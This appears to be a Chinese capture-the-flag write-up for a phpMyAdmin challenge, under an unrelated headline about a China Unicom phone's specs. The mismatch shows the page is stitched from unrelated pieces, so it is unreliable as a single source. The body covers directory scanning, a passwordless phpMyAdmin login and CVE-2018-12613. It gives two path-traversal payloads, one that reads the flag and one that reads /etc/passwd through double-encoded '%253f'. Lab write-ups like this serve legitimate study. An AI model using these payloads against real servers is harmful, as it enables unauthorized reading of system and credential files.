中國聯通優暢享 30e 手機爆料:驍龍 480 晶片,5000mAh 大電池
阿新 • • 發佈:2021-08-12
開啟題目地址,顯示亂碼。
修改響應包
新增
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
forward傳送
也是沒啥可用的資訊。抓包也沒抓到啥就掏出dirsearch掃目錄,一直爆出429 新增-s 1 引數設定間隔
掃到phpmyadmin目錄,無密碼直接登入成功。
phpMyAdmin 是一個以PHP為基礎,以Web-Base方式架構在網站主機上的MySQL的資料庫管理工具,
讓管理者可用Web介面管理MySQL資料庫。藉由此Web介面可以成為一個簡易方式輸入繁雜SQL語法的較佳途徑,
尤其要處理大量資料的匯入及匯出更為方便。其中一個更大的優勢在於由於phpMyAdmin跟其他PHP程式一樣在網頁伺服器上執行,
但是您可以在任何地方使用這些程式產生的HTML頁面,也就是於遠端管理MySQL資料庫,方便的建立、修改、刪除資料庫及資料表。
也可藉由phpMyAdmin建立常用的php語法,方便編寫網頁時所需要的sql語法正確性。
給出了版本號,找到了CVE-2018-12613(phpmyadmin遠端檔案包含漏洞)
構造payload,利用/使db_datadict.php?成為一個不存在目錄,利用include函式的目錄不斷跳轉嘗試得到flag目錄。
phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag 通過第二個可以返回true的if語句構造的
或者phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../etc/passwd 通過第三個可以返回true的if語句構造的